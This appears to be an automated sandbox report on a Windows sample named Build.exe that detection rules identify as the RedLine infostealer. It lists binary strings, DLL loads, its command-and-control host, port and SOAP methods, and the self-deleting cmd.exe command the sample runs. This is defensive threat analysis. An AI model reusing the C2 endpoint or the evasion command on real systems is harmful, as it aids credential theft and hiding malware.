Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: Build.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: Build.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: |
Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.ServiceModel.Internals.pdbbQT;r source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb|M~q source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ".ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.pdbX source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdby source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: erviceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\M source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: 0__31bf3856ad364e35\System.ServiceModel.Internals.pdb) source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.ServiceModel.Internals.pdb8 source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\System.ServiceModel.Internals.pdbpdbals.pdbqq source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: symbols\dll\System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866138722.000000000645A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 6677 |
Source: Yara match |
File source: Build.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Source: global traffic |
TCP traffic: 192.168.2.4:49731 -> 147.185.221.16:6677 |
Source: global traffic |
HTTP traffic detected: POST /IRemotePanel HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: medical-m.gl.at.ply.gg:6677Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive |
Source: Joe Sandbox View |
IP Address: 147.185.221.16 147.185.221.16 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: medical-m.gl.at.ply.gg |
Source: global traffic |
DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa |
Source: unknown |
HTTP traffic detected: POST /IRemotePanel HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: medical-m.gl.at.ply.gg:6677Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive |
Source: Build.exe |
String found in binary or memory: http://checkip.amazonaws.com/)https://ipinfo.io/ip |
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://medical-m.gl.at.ply.gg |
Source: Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://medical-m.gl.at.ply.gg:6677 |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://medical-m.gl.at.ply.gg:6677/IRemotePanel |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next |
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/ |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous |
Source: Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/ |
Source: Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/0 |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/ |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskLR |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse05 |
Source: Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsLR |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse05 |
Source: Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsT |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksLR |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse05 |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoLR |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse05 |
Source: Build.exe |
String found in binary or memory: https://api.ipify.org |
Source: Build.exe |
String found in binary or memory: https://google.com/ |
Source: Build.exe |
String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy |
Source: Build.exe, type: SAMPLE |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown |
Source: Build.exe, type: SAMPLE |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown |
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown |
Source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_00CCDFE8 |
0_2_00CCDFE8 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_00CCD2B0 |
0_2_00CCD2B0 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C689C0 |
0_2_04C689C0 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C64B50 |
0_2_04C64B50 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C65611 |
0_2_04C65611 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C67028 |
0_2_04C67028 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C66FF6 |
0_2_04C66FF6 |
Source: Build.exe, 00000000.00000002.1863379517.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameclr.dllT vs Build.exe |
Source: Build.exe, 00000000.00000000.1640202823.0000000000346000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameRedLine.Client.exe0 vs Build.exe |
Source: Build.exe |
Binary or memory string: OriginalFilenameRedLine.Client.exe0 vs Build.exe |
Source: Build.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: Build.exe, type: SAMPLE |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23 |
Source: Build.exe, type: SAMPLE |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23 |
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23 |
Source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23 |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@8/0@2/1 |
Source: C:\Users\user\Desktop\Build.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03 |
Source: Build.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: Build.exe |
Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80% |
Source: C:\Windows\SysWOW64\taskkill.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6356) |
Source: Build.exe |
ReversingLabs: Detection: 78% |
Source: Build.exe |
Virustotal: Detection: 74% |
Source: unknown |
Process created: C:\Users\user\Desktop\Build.exe "C:\Users\user\Desktop\Build.exe" |
|
Source: C:\Users\user\Desktop\Build.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 |
|
Source: C:\Users\user\Desktop\Build.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\choice.exe |
Section loaded: version.dll |
Jump to behavior |
Source: Build.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR |
Source: Build.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: |
Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.ServiceModel.Internals.pdbbQT;r source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb|M~q source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ".ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.pdbX source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdby source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: erviceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\M source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: 0__31bf3856ad364e35\System.ServiceModel.Internals.pdb) source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.ServiceModel.Internals.pdb8 source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\System.ServiceModel.Internals.pdbpdbals.pdbqq source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: symbols\dll\System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866138722.000000000645A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: Build.exe, LoadExecutor.cs |
.Net Code: SelfExecute System.Reflection.Assembly.Load(byte[]) |
Source: Build.exe |
Static PE information: 0xC739A26A [Sun Dec 1 16:25:14 2075 UTC] |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_00CCF450 push ecx; ret |
0_2_00CCF6A2 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_00CCF650 push ecx; ret |
0_2_00CCF6A2 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C6E389 pushfd ; retf 0004h |
0_2_04C6E38A |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C6AF70 push cs; ret |
0_2_04C6AFA4 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C6E868 pushfd ; retf 0004h |
0_2_04C6E86A |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C6E818 pushfd ; retf 0004h |
0_2_04C6E81A |
Source: C:\Users\user\Desktop\Build.exe |
Process created: "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" |
|
Source: C:\Users\user\Desktop\Build.exe |
Process created: "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" |
Jump to behavior |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 6677 |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
